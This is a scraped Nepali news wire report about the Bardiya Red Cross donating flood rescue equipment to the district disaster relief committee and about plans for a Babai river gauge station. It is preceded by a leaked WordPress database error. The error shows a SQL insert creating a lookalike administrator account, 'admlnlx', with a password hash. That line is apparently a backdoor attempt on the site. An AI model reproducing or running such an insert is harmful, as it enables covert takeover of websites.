WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLl6yh3aMr6kSXeQKqlqoKEw3OWc0M/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-23 20:49:27', '', 'admlnlx', 'admlnlx')
बर्दिया (गुलरिया), फागुन १ –
विपद् प्रतिकार्यका लागि जिल्ला रेडक्रस बर्दियाले रु २३ लाख बराबरको सामग्री जिल्ला दैवीप्रकोप उद्वार समितिलाई हस्तान्तरण गरेको छ ।
जिल्ला दैवीप्रकोप उद्वार समितिको बैठकमा रेडक्रस बर्दियाका सभापति कृष्णप्रसाद गौतमले समितिका अध्यक्ष एवम् प्रमुख जिल्ला अधिकारी विष्णुबहादुर थापालाई सो सामग्री हस्तान्तरण गर्नुभयो ।
बर्दियामा बाढीका बेला उद्वारका लागि रबड बोटको अभाव देखेर दातृनिकायलाई अनुरोधपछि युरेपियन कमिसनको सहयोगमा डिपेको– ८ अन्तर्गत सामग्री प्राप्त भएको रेडक्रस बर्दियाका सभापति गौतमले बताउनुभयो ।
वितरण गरिएको सामग्रीमा रवड बोट, सामग्री भन्डारण गर्ने कन्टेनर, लाइफ ज्याकेट, मेघा फोन, क्याराबिनर, स्ट्रेचर, फायर एक्स्टिङगुसरलगायतका सामग्री रहेका छन् ।
बर्दिया जिल्ला बाढीले बर्सेनि प्रभावित हुने भएकाले सहयोग उपयोगी हुने प्रमुख जिल्ला अधिकारी थापाले बताउनुभयो ।
रेडक्रस बर्दियाका सभापति गौतमले दैवीप्रकोप उद्वार समितिले खोज तथा उद्वार सामग्रीको अभाव पहिचान गरेबमोजिमको सामग्री उपलब्ध गराएको जानकारी दिनुभयो ।
दैवीप्रकोप उद्वार समितिको बैठकले बाढीको जोखिम कम गर्न बबई नदीको माथिल्लो तटीय क्षेत्र सल्यानको घुइँयाबारीमा गेज स्टेसन राख्नका लागि पहल गर्ने निर्णय गरेको छ । जसका लागि जनसङ्ख्या तथा वातावरण मन्त्रालय, जल तथा मौसम विज्ञान विभाग अन्तर्गत कर्णाली बेँसिन कार्यालयलाई थारु महिला उत्थान केन्द्रको अनुकुलन परियोजनाका आर्थिक सहयोगमा निमार्ण गर्नेसमेत निर्णय गरेको छ । निमार्णपछि बाढीको सतहको पूर्व–सूचना हाल भएको व्यवस्था भन्दा तीन घन्टा पहिलेनै प्राप्त गर्नेसमेत जानकारी गराइएको थियो ।
त्यसैगरी रेडक्रस बर्दियाले ‘प्लान’ नेपालको सहयोगमा जिल्लाको राजापुर नगरपालिका, खैरीचन्दनपुर र सूर्यपटुवाको– ६ वटा विद्यालयमा बाल केन्द्रित विपद् जोखिम न्यूनीकरण कार्यक्रम सञ्चालन गरेको जानकारी गराएको थियो । – रासस